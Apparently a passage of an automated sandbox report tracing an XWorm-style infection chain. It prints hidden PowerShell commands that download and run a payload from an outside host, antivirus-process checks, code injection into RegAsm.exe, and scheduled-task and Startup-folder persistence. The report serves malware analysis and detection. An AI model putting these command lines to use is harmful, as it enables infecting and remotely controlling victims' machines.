              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00943CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_00285D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_00285D13
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
              Source: msword.exe, 0000000E.00000002.1969463085.000000000054D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: mshta.exe, 00000000.00000003.1904929361.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917190543.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1904929361.000000000A701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919817498.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915262349.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919753403.000000000A703000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1914069158.000000000A735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Carter.pif, 0000001D.00000002.3852527284.0000000001037000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E45D5 BlockInput,29_2_002E45D5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,29_2_00285240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,29_2_002A5CAC
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_004062FC
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,29_2_002C88CD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029A354 SetUnhandledExceptionFilter,29_2_0029A354
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0029A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0090A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090A354 SetUnhandledExceptionFilter,37_2_0090A354
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: D50000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: D50000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: FC4000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C9369 LogonUserW,29_2_002C9369
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,29_2_00285240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D1AC6 SendInput,keybd_event,29_2_002D1AC6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D51E2 mouse_event,29_2_002D51E2
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,29_2_002C88CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,29_2_002D4F1C
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000000.1943094655.0000000000326000.00000002.00000001.01000000.0000000F.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Carter.pif, DanielPulse.scrBinary or memory string: Shell_TrayWnd
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029885B cpuid 29_2_0029885B
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
